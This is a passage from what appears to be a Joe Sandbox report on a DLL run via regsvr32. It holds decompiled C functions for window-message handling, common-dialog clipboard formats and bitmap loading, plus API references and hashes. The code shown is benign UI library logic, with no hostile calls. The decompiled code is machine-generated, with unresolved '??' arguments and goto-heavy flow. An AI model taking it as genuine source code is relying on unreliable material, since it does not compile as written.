								if( *((intOrPtr*)( *_t106 + 0x15c))() == 0 || _v8 != 0xe81f) {
									E10035F35(_t123, _t106, _t122[2] & _t130, 1);
								}
							}
							if(_v12 != 0) {
								continue;
							} else {
								_t103 = 0;
								goto L16;
							}
						}
						E1000A069(_t106, _t113, _t122, _t123, __eflags);
						goto L22;
					}
				}
				L1:
				E1000A069(_t103, _t107, _t122, _t123, _t132);
				goto L2;
			}

0x10036498
0x10036498
0x1003649e
0x100364a2
0x100364a4
0x100364a6
0x100364a8
0x100364af
0x100364b1
0x100364b9
0x100364bd
0x00000000
0x100364bf
0x100364c3
0x100364c5
0x100364cc
0x100364d5
0x100364d5
0x100364cc
0x100364d8
0x100364e0
0x100364e1
0x100364e5
0x100364e9
0x10036576
0x1003657e
0x10036581
0x10036636
0x1003663c
0x1003663e
0x10036640
0x10036649
0x1003664f
0x10036651
0x10036653
0x1003665d
0x1003665d
0x1003666a
0x1003666a
0x10036670
0x10036674
0x1003667d
0x10036689
0x10036689
0x10036693
0x10036698
0x1003669b
0x100366a5
0x100366a5
0x100366ae
0x100366b4
0x100366b6
0x100366b8
0x100366c0
0x100366c0
0x100366ca
0x100366d7
0x100366da
0x100366df
0x100366e6
0x100366e6
0x1003658d
0x10036593
0x100365a3
0x100365a7
0x100365ab
0x100365b4
0x100365bc
0x100365bf
0x100365c7
0x100365d1
0x100365d7
0x100365d7
0x100365d7
0x100365d7
0x100365e1
0x100365eb
0x100365ee
0x100365fa
0x10036609
0x10036609
0x00000000
0x100365fc
0x10036600
0x1003660d
0x1003660f
0x1003661d
0x1003661d
0x00000000
0x1003660f
0x00000000
0x00000000
0x00000000
0x100364ef
0x100364ef
0x100364f4
0x100364ff
0x10036503
0x00000000
0x00000000
0x10036512
0x1003651e
0x10036522
0x1003652f
0x1003653b
0x1003653d
0x1003653d
0x1003654d
0x10036564
0x10036564
0x1003654d
0x1003656e
0x00000000
0x10036574
0x10036574
0x00000000
0x10036574
0x1003656e
0x10036604
0x00000000
0x10036604
0x100364bd
0x100364aa
0x100364aa
0x00000000

APIs

GetDlgCtrlID.USER32 ref: 1003650C
GetDlgItem.USER32(?,?), ref: 100365A3
ShowWindow.USER32(00000000,00000000), ref: 100365AB
GetMenu.USER32 ref: 100365B4
InvalidateRect.USER32(00000001,00000000,00000001), ref: 100365C7
SetMenu.USER32 ref: 100365D1

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

GetDlgItem.USER32(0000E900,0000E900), ref: 10036600
SetWindowLongA.USER32 ref: 1003661D
GetDlgItem.USER32(0000EA21,0000EA21), ref: 1003663C
GetDlgItem.USER32(0000E900,0000E900), ref: 1003664F
SetWindowLongA.USER32 ref: 1003665D
SetWindowLongA.USER32 ref: 1003666A
InvalidateRect.USER32(00000001,00000000,00000001), ref: 1003667D
SetMenu.USER32 ref: 10036689
GetDlgItem.USER32(00000000,00000000), ref: 100366BE
ShowWindow.USER32(?,00000005), ref: 100366CA

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ItemWindow$LongMenu$InvalidateRectShow$CtrlException@8H_prolog3Throw
String ID:
API String ID: 4160985441-0
Opcode ID: 017ece0ee0ca91853db6539d47dc82f8072cbc3049108b4c43f3cf731b890b4e
Instruction ID: 54e0ea85a30db0f840d0658cc435978594878730bfb9ef9f52a14b7152f25a01
Opcode Fuzzy Hash: 017ece0ee0ca91853db6539d47dc82f8072cbc3049108b4c43f3cf731b890b4e
Instruction Fuzzy Hash: 056169756007019FEB11DF64CC89A6AB7E5FF49386F004A6DF19A9A2A0DB30E854CB51

Uniqueness

Uniqueness Score: -1.00%

Function 100270E7 Relevance: 24.2, APIs: 16, Instructions: 180
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E100270E7(intOrPtr* __ecx, struct tagMSG* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				struct tagMSG _v44;
				int _t29;
				struct HWND__* _t32;
				int _t45;
				long _t59;
				intOrPtr _t63;
				int _t64;
				struct HWND__* _t68;
				struct HWND__* _t76;
				struct tagMSG* _t77;

				_t77 = _a4;
				_t29 = _t77->message;
				_v8 = __ecx;
				if(_t29 == 0x367 || _t29 == 0x100 && _t77->wParam == 0x1b) {
					_push(1);
					_push(_t29);
					_push(_t29);
					_push(0);
					goto L37;
				} else {
					if(_t29 < 0x200 || _t29 > 0x209) {
						if(_t29 < 0xa0 || _t29 > 0xa9) {
							if(_t29 == 0x112 || _t29 >= 0x100 && _t29 <= 0x109) {
								_t32 = GetCapture();
								_t76 = 0;
								if(_t32 == 0) {
									L29:
									if(PeekMessageA(_t77, _t76, _t77->message, _t77->message, _t76) == 0) {
										goto L35;
									}
									GetMessageA(_t77, _t76, _t77->message, _t77->message);
									_push(_t77);
									if( *((intOrPtr*)( *_v8 + 0x100))() != 0) {
										goto L35;
									}
									TranslateMessage(_t77);
									_t45 = _t77->message;
									if(_t45 == 0x112 || _t45 >= 0x104 && _t45 <= 0x107) {
										goto L34;
									} else {
										goto L35;
									}
								}
								ReleaseCapture();
								do {
								} while (PeekMessageA( &_v44, 0, 0x200, 0x209, 3) != 0);
								goto L29;
							} else {
								if(PeekMessageA(_t77, 0, _t29, _t29, 1) == 0) {
									goto L8;
								}
								goto L20;
							}
						} else {
							goto L7;
						}
					} else {
						L7:
						_t68 = L10026FD8(_v8, _t77->pt, _t77->pt.y,  &_a4);
						_t76 = 0;
						if(_t68 != 0) {
							if(_a4 == 0) {
								PeekMessageA(_t77, 0, _t77->message, _t77->message, 1);
								L20:
								DispatchMessageA(_t77);
								goto L8;
							}
							if(_t77->message == 0x201) {
								_t59 = SendMessageA(_t68, 0x84, 0, (_t77->pt.y & 0x0000ffff) << 0x00000010 | _t77->pt & 0x0000ffff);
								if(_t59 == 5 || _t59 == 3) {
									ReleaseCapture();
									GetMessageA(_t77, _t76, 0xa1, 0xa1);
									L34:
									DispatchMessageA(_t77);
									L35:
									GetCursorPos( &_v16);
									L10026FD8(_v8, _v16.x, _v16.y, _t76);
									goto L8;
								} else {
									if(_t59 != 1) {
										_t63 = L10026E3E(_t59);
									} else {
										_t63 = L10026DD0(_t68, _t77->pt, _t77->pt.y);
									}
									_push(1);
									 *_a8 = _t63;
									_t64 = _t77->message;
									_push(_t64);
									_push(_t64);
									_push(_t76);
									L37:
									PeekMessageA(_t77, ??, ??, ??, ??);
									return 0;
								}
							}
							PeekMessageA(_t77, 0, _t77->message, _t77->message, 1);
						}
						L8:
						return 1;
					}
				}
			}

0x100270ef
0x100270f2
0x100270fb
0x100270fe
0x100272cc
0x100272ce
0x100272cf
0x100272d0
0x00000000
0x10027117
0x1002711c
0x1002712a
0x1002720a
0x1002722e
0x1002723a
0x1002723e
0x1002725d
0x10027269
0x00000000
0x00000000
0x10027272
0x1002727d
0x10027286
0x00000000
0x00000000
0x10027289
0x1002728f
0x10027297
0x00000000
0x00000000
0x00000000
0x00000000
0x10027297
0x10027240
0x10027246
0x10027259
0x00000000
0x10027217
0x10027226
0x00000000
0x00000000
0x00000000
0x1002722c
0x00000000
0x00000000
0x00000000
0x1002713b
0x1002713b
0x1002714d
0x1002714f
0x10027153
0x10027160
0x100271f3
0x100271f9
0x100271fa
0x00000000
0x100271fa
0x1002716d
0x10027195
0x1002719e
0x100271d0
0x100271df
0x100272a7
0x100272a8
0x100272ae
0x100272b2
0x100272c2
0x00000000
0x100271a5
0x100271a8
0x100271c9
0x100271aa
0x100271b1
0x100271b1
0x100271b9
0x100271bb
0x100271bd
0x100271c0
0x100271c1
0x100271c2
0x100272d2
0x100272d3
0x00000000
0x100272d9
0x1002719e
0x10027178
0x10027178
0x10027155
0x00000000
0x10027157
0x1002711c

APIs

PeekMessageA.USER32(?,00000000,00000201,00000201,00000001), ref: 10027178
SendMessageA.USER32 ref: 10027195
ReleaseCapture.USER32 ref: 100271D0
GetMessageA.USER32 ref: 100271DF
PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 100271F3
DispatchMessageA.USER32 ref: 100271FA
DispatchMessageA.USER32 ref: 100272A8
GetCursorPos.USER32(?), ref: 100272B2
PeekMessageA.USER32(?,00000000,?,?,00000001), ref: 100272D3

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Message$Peek$Dispatch$CaptureCursorReleaseSend
String ID:
API String ID: 597789953-0
Opcode ID: 48c5a11eb3a8d3d632750daefe0e14eb920db7b13074f27541598bdfc59b2dac
Instruction ID: 0133134a9c7e2fbc1140e53e7cb55acdd5b0000d3e4746bd5cbf52369a1aa7df
Opcode Fuzzy Hash: 48c5a11eb3a8d3d632750daefe0e14eb920db7b13074f27541598bdfc59b2dac
Instruction Fuzzy Hash: 6351BD34A00615FBEB21DBA4ED88EAF37BDFF8A741F900419F94AD2190D774E9948721

Uniqueness

Uniqueness Score: -1.00%

Function 1003FF42 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 127
registryclipboardCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E1003FF42(void* __ebx, struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t31;
				signed int _t33;
				void* _t40;
				int _t46;
				void* _t51;
				intOrPtr _t52;
				signed int _t58;
				signed int* _t66;
				void* _t67;
				signed int _t68;
				signed int _t70;

				_t51 = __ebx;
				if(_a4 != 0) {
					_push(_t67);
					_push(0x1000a083);
					_t54 = 0x100bdc04;
					_t68 = L10020A61(__ebx, 0x100bdc04, 0, _t67, __eflags);
					__eflags = _t68;
					if(__eflags == 0) {
						E1000A069(__ebx, 0x100bdc04, 0, _t68, __eflags);
					}
					__eflags =  *(_t68 + 0x18);
					if(__eflags != 0) {
						__eflags = E10014011(_t54, 0, _t68, __eflags, _a4);
						if(__eflags == 0) {
							_t54 =  *(_t68 + 0x18);
							L10014FB7( *(_t68 + 0x18), __eflags, _a4);
							 *(_t68 + 0x18) = 0;
						}
					}
					_push(_t51);
					_t52 = _a8;
					__eflags = _t52 - 0x110;
					if(_t52 != 0x110) {
						__eflags = _t52 -  *0x100bdf30; // 0x0
						if(__eflags == 0) {
							L25:
							SendMessageA(_a4, 0x111, 0xe146, 0);
							_t31 = 1;
							__eflags = 1;
							goto L26;
						}
						__eflags = _t52 - 0x111;
						if(_t52 != 0x111) {
							L12:
							__eflags = _t52 - 0xc000;
							if(__eflags < 0) {
								L22:
								_t31 = 0;
								goto L26;
							}
							_t70 = E10014011(_t54, 0x110, _t68, __eflags, _a4);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L22;
							}
							_t33 = E100203AA(_t70, 0x1009eb24);
							__eflags = _t33;
							if(_t33 == 0) {
								L16:
								__eflags = _t52 -  *0x100bdf24; // 0x0
								if(__eflags != 0) {
									__eflags = _t52 -  *0x100bdf28; // 0x0
									if(__eflags != 0) {
										__eflags = _t52 -  *0x100bdf20; // 0x0
										if(__eflags != 0) {
											__eflags = _t52 -  *0x100bdf2c; // 0x0
											if(__eflags != 0) {
												goto L22;
											}
											_t31 =  *((intOrPtr*)( *_t70 + 0x15c))();
											goto L26;
										}
										_t58 = _a16 >> 0x10;
										__eflags = _t58;
										 *((intOrPtr*)( *_t70 + 0x164))(_a12, _a16 & 0x0000ffff, _t58);
										goto L22;
									}
									_t19 = _t70 + 0x1c4; // 0x1c4
									_t66 = _t19;
									 *_t66 = _a16;
									_t31 =  *((intOrPtr*)( *_t70 + 0x160))();
									 *_t66 =  *_t66 & 0x00000000;
									goto L26;
								}
								_t31 =  *((intOrPtr*)( *_t70 + 0x15c))(_a16);
								goto L26;
							}
							_t40 = E10037F5D(_t70);
							__eflags =  *(_t40 + 0x34) & 0x00080000;
							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
								goto L22;
							}
							goto L16;
						}
						__eflags = _a12 - 0x40e;
						if(_a12 == 0x40e) {
							goto L25;
						}
						goto L12;
					} else {
						 *0x100bdf20 = RegisterClipboardFormatA("commdlg_LBSelChangedNotify");
						 *0x100bdf24 = RegisterClipboardFormatA("commdlg_ShareViolation");
						 *0x100bdf28 = RegisterClipboardFormatA("commdlg_FileNameOK");
						 *0x100bdf2c = RegisterClipboardFormatA("commdlg_ColorOK");
						 *0x100bdf30 = RegisterClipboardFormatA("commdlg_help");
						_t46 = RegisterClipboardFormatA("commdlg_SetRGBColor");
						_push(_a16);
						 *0x100bdf34 = _t46;
						_push(_a12);
						_t31 = E1001B5C0(_t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
						L26:
						return _t31;
					}
				}
				return 0;
			}

0x1003ff42
0x1003ff4b
0x1003ff54
0x1003ff55
0x1003ff5a
0x1003ff64
0x1003ff66
0x1003ff68
0x1003ff6a
0x1003ff6a
0x1003ff6f
0x1003ff72
0x1003ff7c
0x1003ff7e
0x1003ff83
0x1003ff86
0x1003ff8b
0x1003ff8b
0x1003ff7e
0x1003ff8e
0x1003ff8f
0x1003ff97
0x1003ff99
0x1003fffd
0x10040008
0x100400ca
0x100400d5
0x100400dd
0x100400dd
0x00000000
0x100400dd
0x1004000e
0x10040010
0x1004001e
0x1004001e
0x10040024
0x100400b2
0x100400b2
0x00000000
0x100400b2
0x10040032
0x10040034
0x10040036
0x00000000
0x00000000
0x1004003f
0x10040044
0x10040046
0x10040058
0x10040058
0x1004005e
0x1004006f
0x10040075
0x10040091
0x10040097
0x100400b6
0x100400bc
0x00000000
0x00000000
0x100400c2
0x00000000
0x100400c2
0x1004009e
0x1004009e
0x100400ac
0x00000000
0x100400ac
0x1004007a
0x1004007a
0x10040080
0x10040086
0x1004008c
0x00000000
0x1004008c
0x10040067
0x00000000
0x10040067
0x1004004a
0x1004004f
0x10040056
0x00000000
0x00000000
0x00000000
0x10040056
0x10040012
0x10040018
0x00000000
0x00000000
0x00000000
0x1003ff9b
0x1003ffad
0x1003ffb9
0x1003ffc5
0x1003ffd1
0x1003ffdd
0x1003ffe2
0x1003ffe4
0x1003ffe7
0x1003ffec
0x1003fff3
0x100400de
0x00000000
0x100400df
0x1003ff99
0x00000000

APIs

RegisterClipboardFormatA.USER32(commdlg_LBSelChangedNotify), ref: 1003FFA6
RegisterClipboardFormatA.USER32(commdlg_ShareViolation), ref: 1003FFB2
RegisterClipboardFormatA.USER32(commdlg_FileNameOK), ref: 1003FFBE
RegisterClipboardFormatA.USER32(commdlg_ColorOK), ref: 1003FFCA
RegisterClipboardFormatA.USER32(commdlg_help), ref: 1003FFD6
RegisterClipboardFormatA.USER32(commdlg_SetRGBColor), ref: 1003FFE2

Strings

commdlg_ColorOK, xrefs: 1003FFC0
commdlg_ShareViolation, xrefs: 1003FFA8
commdlg_SetRGBColor, xrefs: 1003FFD8
commdlg_LBSelChangedNotify, xrefs: 1003FFA1
commdlg_help, xrefs: 1003FFCC
commdlg_FileNameOK, xrefs: 1003FFB4

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
API String ID: 1228543026-3888057576
Opcode ID: 78b52f88f7b3ac91f3cc894954dfef21359b3b53205421f08440025b00c23b84
Instruction ID: 362deadbe15acc06b87cc667881c5110df2592d32378ddc96c768b07699d1440
Opcode Fuzzy Hash: 78b52f88f7b3ac91f3cc894954dfef21359b3b53205421f08440025b00c23b84
Instruction Fuzzy Hash: 9741A9345043569FDB21EF60CC84AAE7BE1FF48390F21053AF945AB261E7719890DBA6

Uniqueness

Uniqueness Score: -1.00%

Function 1003E25A Relevance: 22.6, APIs: 15, Instructions: 139
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1003E25A(signed int _a4, signed int _a8, struct HDC__* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t52;
				void* _t53;
				void* _t56;
				signed int _t63;
				struct HDC__* _t64;
				struct HBITMAP__* _t65;
				struct HDC__* _t69;
				void* _t76;
				struct HDC__* _t79;
				intOrPtr* _t82;
				void* _t91;
				signed int _t92;
				intOrPtr _t100;
				int* _t101;
				int _t102;
				void* _t103;
				BITMAPINFO* _t104;
				void* _t106;

				_t52 = LoadResource(_a4, _a8);
				_v20 = _t52;
				if(_t52 == 0) {
					return _t52;
				}
				_t53 = LockResource(_t52);
				_t76 = _t53;
				_v16 = _t76;
				if(_t76 == 0) {
					L17:
					return _t53;
				}
				_push(_t103);
				_t98 =  *_t76 + 0x40;
				_t53 = E10047026(_t76, _t91,  *_t76 + 0x40, _t103,  *_t76 + 0x40);
				_t104 = _t53;
				if(_t104 == 0) {
					L16:
					goto L17;
				} else {
					L1000A7FB(_t98, _t104, _t106, _t104, _t98, _t76, _t98);
					_t56 = _t104 + _t104->bmiHeader;
					_a8 = _a8 & 0x00000000;
					_v12 = _t56;
					do {
						_t82 = _t56 + _a8 * 4;
						_t100 =  *_t82;
						_t92 = 0;
						_v8 = _t82;
						while(_t100 !=  *((intOrPtr*)(0x1009f454 + _t92 * 8))) {
							_t92 = _t92 + 1;
							if(_t92 < 4) {
								continue;
							}
							goto L12;
						}
						__eflags = _a12;
						if(_a12 == 0) {
							_t101 = 0x1009f458 + _t92 * 8;
							_a4 = GetSysColor( *_t101) & 0x000000ff;
							GetSysColor( *_t101);
							_a4 = _a4 << 8;
							_t63 = GetSysColor( *_t101) >> 0x00000010 & 0x000000ff | _a4;
							__eflags = _t63;
							 *_v8 = _t63;
							_t56 = _v12;
						} else {
							__eflags =  *(0x1009f458 + _t92 * 8) - 0x12;
							if(__eflags != 0) {
								 *_t82 = 0xffffff;
							}
						}
						L12:
						_a8 = _a8 + 1;
					} while (_a8 < 0x10);
					_t102 = _t104->bmiHeader.biWidth;
					_t79 = _t104->bmiHeader.biHeight;
					_a4 = _t102;
					_a8 = _t79;
					_t64 = GetDC(0);
					_a12 = _t64;
					_t65 = CreateCompatibleBitmap(_t64, _t102, _t79);
					_v8 = _t65;
					if(_t65 != 0) {
						_t69 = CreateCompatibleDC(_a12);
						_t102 = SelectObject;
						_t79 = _t69;
						_v12 = SelectObject(_t79, _v8);
						StretchDIBits(_t79, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v16 + 0x28 + (1 << _t104->bmiHeader.biBitCount) * 4, _t104, 0, 0xcc0020);
						SelectObject(_t79, _v12);
						DeleteDC(_t79);
					}
					ReleaseDC(0, _a12);
					_push(_t104);
					E100470E9(_t79, _t102, _t104, 0);
					FreeResource(_v20);
					_t53 = _v8;
					goto L16;
				}
			}

0x1003e266
0x1003e26e
0x1003e271
0x1003e3d8
0x1003e3d8
0x1003e279
0x1003e27f
0x1003e283
0x1003e286
0x1003e3d6
0x00000000
0x1003e3d6
0x1003e28c
0x1003e290
0x1003e294
0x1003e299
0x1003e29e
0x1003e3d4
0x00000000
0x1003e2a4
0x1003e2a8
0x1003e2b5
0x1003e2ba
0x1003e2be
0x1003e2c1
0x1003e2c4
0x1003e2c7
0x1003e2c9
0x1003e2cb
0x1003e2ce
0x1003e2d7
0x1003e2db
0x00000000
0x00000000
0x00000000
0x1003e2dd
0x1003e2df
0x1003e2e3
0x1003e2f7
0x1003e307
0x1003e30a
0x1003e318
0x1003e327
0x1003e327
0x1003e32a
0x1003e32c
0x1003e2e5
0x1003e2e5
0x1003e2ed
0x1003e2ef
0x1003e2ef
0x1003e2ed
0x1003e32f
0x1003e32f
0x1003e332
0x1003e338
0x1003e33b
0x1003e340
0x1003e343
0x1003e346
0x1003e34f
0x1003e352
0x1003e35a
0x1003e35d
0x1003e362
0x1003e36b
0x1003e371
0x1003e386
0x1003e3a3
0x1003e3ad
0x1003e3b0
0x1003e3b0
0x1003e3bb
0x1003e3c1
0x1003e3c2
0x1003e3cb
0x1003e3d1
0x00000000
0x1003e3d1

APIs

LoadResource.KERNEL32(?,?), ref: 1003E266
LockResource.KERNEL32(00000000), ref: 1003E279
_malloc.LIBCMT ref: 1003E294

Part of subcall function 10047026: __FF_MSGBANNER.LIBCMT ref: 10047049
Part of subcall function 10047026: __NMSG_WRITE.LIBCMT ref: 10047050
Part of subcall function 10047026: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001), ref: 1004709E

Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B

GetSysColor.USER32 ref: 1003E300
GetSysColor.USER32 ref: 1003E30A
GetSysColor.USER32 ref: 1003E31C
GetDC.USER32(00000000), ref: 1003E346
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1003E352
CreateCompatibleDC.GDI32(00000000), ref: 1003E362
SelectObject.GDI32(00000000,?), ref: 1003E374
StretchDIBits.GDI32(00000000,00000000,00000000,00000008,00000010,00000000,00000000,00000008,00000010,?,00000000,00000000,00CC0020), ref: 1003E3A3
SelectObject.GDI32(00000000,00000008), ref: 1003E3AD
DeleteDC.GDI32(00000000), ref: 1003E3B0
ReleaseDC.USER32(00000000,00000000), ref: 1003E3BB
FreeResource.KERNEL32(00000000), ref: 1003E3CB

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ColorResource$CompatibleCreateObjectSelect$AllocateBitmapBitsDeleteFreeHeapLoadLockReleaseStretch_malloc_memcpy_s
String ID:
API String ID: 2870220007-0
Opcode ID: 6d0353da55908fa1d7fa2fca56e87630e8cd8c4d44a627cf339c2c26641931c0
Instruction ID: 846dad1bffad77f9de73737dced2376ddc84ebc6593853536fcd04f89a08638a
Opcode Fuzzy Hash: 6d0353da55908fa1d7fa2fca56e87630e8cd8c4d44a627cf339c2c26641931c0
Instruction Fuzzy Hash: EF416D75900219EFEB01DFA4CC849AE7BB9FF49341F108469F9169B2A1DB31EA10DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000DAF6 Relevance: 21.2, APIs: 14, Instructions: 244
windowCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E1000DAF6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t144;
				void* _t146;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t153;
				intOrPtr _t154;
				void* _t206;

				_t195 = __edi;
				_push(0x6c);
				E1004764D(0x1008e153, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t206 - 0x40)) = 0x1009a2fc;
				 *(_t206 - 0x3c) = 0;
				 *((intOrPtr*)(_t206 - 0x38)) = 0;
				 *((intOrPtr*)(_t206 - 0x34)) = 0;
				 *(_t206 - 4) = 0;
				 *((intOrPtr*)(_t206 - 0x50)) = 0x1009a2fc;
				 *(_t206 - 0x4c) = 0;
				 *((intOrPtr*)(_t206 - 0x48)) = 0;
				 *((intOrPtr*)(_t206 - 0x44)) = 0;
				 *((intOrPtr*)(_t206 - 0x30)) = 0x1009a2fc;
				 *(_t206 - 0x2c) = 0;
				 *((intOrPtr*)(_t206 - 0x28)) = 0;
				 *((intOrPtr*)(_t206 - 0x24)) = 0;
				 *((intOrPtr*)(_t206 - 0x14)) = 0;
				 *((intOrPtr*)(_t206 - 0x18)) = 0x10098d24;
				 *(_t206 - 0x1c) = 0;
				 *((intOrPtr*)(_t206 - 0x20)) = 0x1009831c;
				 *(_t206 - 4) = 4;
				if(L1000CCDC(_t206 - 0x40, __edi, _t206, CreateCompatibleDC(0)) != 0 && L1000CCDC(_t206 - 0x50, __edi, _t206, CreateCompatibleDC(0)) != 0 && L1000CCDC(_t206 - 0x30, _t195, _t206, CreateCompatibleDC(0)) != 0 && GetObjectA( *( *((intOrPtr*)(_t206 + 8)) + 4), 0x18, _t206 - 0x78) != 0) {
					L1000CFF6( *((intOrPtr*)(_t206 + 0xc)));
					if(L1000111D( *((intOrPtr*)(_t206 + 0xc)),  *(_t206 - 0x74),  *(_t206 - 0x70),  *(_t206 - 0x68) & 0x0000ffff,  *(_t206 - 0x66) & 0x0000ffff, 0) != 0) {
						L1000CFA3(_t206 - 0x18, 1, _t206, CreateBitmap(8, 8, 1, 1, 0x1009a504));
						E1000D03E(_t206 - 0x20, _t206 - 0x18);
						L1000CFF6(_t206 - 0x18);
						L1000CFA3(_t206 - 0x18, 1, _t206, CreateBitmap( *(_t206 - 0x74),  *(_t206 - 0x70), 1, 1, 0));
						 *((intOrPtr*)(_t206 + 8)) = E1000D0A1( *(_t206 - 0x3c),  *( *((intOrPtr*)(_t206 + 8)) + 4));
						_t144 = E1000D0A1( *(_t206 - 0x4c),  *((intOrPtr*)(_t206 - 0x14)));
						 *((intOrPtr*)(_t206 - 0x10)) = _t144;
						if( *((intOrPtr*)(_t206 + 8)) != 0 && _t144 != 0) {
							_t146 = E1000BD03(GetPixel( *(_t206 - 0x3c), 0, 0), _t206 - 0x40, _t145);
